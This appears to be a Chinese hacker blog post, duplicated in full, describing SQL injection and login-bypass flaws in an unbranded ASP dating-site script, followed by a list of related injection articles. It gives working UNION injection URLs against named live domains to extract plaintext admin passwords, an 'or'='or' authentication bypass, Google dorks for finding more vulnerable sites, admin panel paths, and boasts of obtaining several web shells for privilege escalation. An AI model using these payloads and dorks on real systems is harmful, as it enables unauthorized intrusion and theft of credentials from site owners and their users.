某交友网站的注入漏洞。我也不知道是那套程序。居然没版权。肯定是山寨版的,因为代码写的很烂。
先说一个sql注入漏洞。
在party_discuss_list.asp页面,看此处代码:
rs8=server.CreateObject ("ADODB.recordset")
sql="select * from party_discuss where id="&Request("id")
sql=sql&" order by time desc"
rs8.Open sql,conn1,3
没过滤吧,但是在测试时,居然不能注入,工具这时候是无能的,但人是活的,关键是多了句order by time desc多了这句工具就无法判断了注入点了。不过这个也好办,用2次union就可解决。注入语句:
http://www.sdqnw.cn/friend/love/party/party_discuss_list.asp?id=33 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin
http://www.xicv.com/love/love/party/party_discuss_list.asp?id=1 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin
其中密码是明文。
二,后台登陆验证的缺陷。在after_login.asp页面是这么判断帐号和密码的:
admin_id=request("admin_id") //这里居然不过率单引号
passwd=replace(trim(request("passwd")),"'","")
Set conn = Server.CreateObject("ADODB.Connection")
DBPath = Server.MapPath("../db/sjxffriend.asa")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
Set rs_admin = Server.CreateObject("ADODB.Recordset")
sql="select * from admin where admin_id like '" & admin_id & "' and passwd like '" & passwd & "'"
rs_admin.open sql,conn,3,2
呵呵,看到怎么办了吧,用'or'='or' 就行。密码随便填。
还有cookies注入就不说了。
Goole:inurl:party/party_discuss_list.asp 不想搞密码了直接进后台也行。
后台地址:admin/login.htm
附:在挖这个洞时一不小心挖到了另外一个企业网站系统的洞,我也没下源码看。
Google:格式+86-0769-3301739 后台地址:manage/login.asp 用万能密码登陆。 不一会儿五六个shell了,交给enterer去提权了,我也该吃饭了。
先说一个sql注入漏洞。
在party_discuss_list.asp页面,看此处代码:
rs8=server.CreateObject ("ADODB.recordset")
sql="select * from party_discuss where id="&Request("id")
sql=sql&" order by time desc"
rs8.Open sql,conn1,3
没过滤吧,但是在测试时,居然不能注入,工具这时候是无能的,但人是活的,关键是多了句order by time desc多了这句工具就无法判断了注入点了。不过这个也好办,用2次union就可解决。注入语句:
http://www.sdqnw.cn/friend/love/party/party_discuss_list.asp?id=33 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin
http://www.xicv.com/love/love/party/party_discuss_list.asp?id=1 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin
其中密码是明文。
二,后台登陆验证的缺陷。在after_login.asp页面是这么判断帐号和密码的:
admin_id=request("admin_id") //这里居然不过率单引号
passwd=replace(trim(request("passwd")),"'","")
Set conn = Server.CreateObject("ADODB.Connection")
DBPath = Server.MapPath("../db/sjxffriend.asa")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
Set rs_admin = Server.CreateObject("ADODB.Recordset")
sql="select * from admin where admin_id like '" & admin_id & "' and passwd like '" & passwd & "'"
rs_admin.open sql,conn,3,2
呵呵,看到怎么办了吧,用'or'='or' 就行。密码随便填。
还有cookies注入就不说了。
Goole:inurl:party/party_discuss_list.asp 不想搞密码了直接进后台也行。
后台地址:admin/login.htm
附:在挖这个洞时一不小心挖到了另外一个企业网站系统的洞,我也没下源码看。
Google:格式+86-0769-3301739 后台地址:manage/login.asp 用万能密码登陆。 不一会儿五六个shell了,交给enterer去提权了,我也该吃饭了。
只显示10条记录相关文章
关于access sql 偏移注入 (浏览: 10690, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15866, 评论: 0)
B2B电子商务购物网站Cookies注入漏洞 (浏览: 9086, 评论: 0)
志坚网络新闻系统 1.0 多文件存在Cookies注入 (浏览: 9425, 评论: 0)
ACCESS数据库手工注入备忘 (浏览: 33, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 12351, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 8055, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15866, 评论: 0)
B2B电子商务购物网站Cookies注入漏洞 (浏览: 9086, 评论: 0)
志坚网络新闻系统 1.0 多文件存在Cookies注入 (浏览: 9425, 评论: 0)
ACCESS数据库手工注入备忘 (浏览: 33, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 12351, 评论: 0)
MSSQL显错模式的手工注入实现原理思考和实战 (浏览: 8055, 评论: 0)
Trackbacks
 |
 |
 |
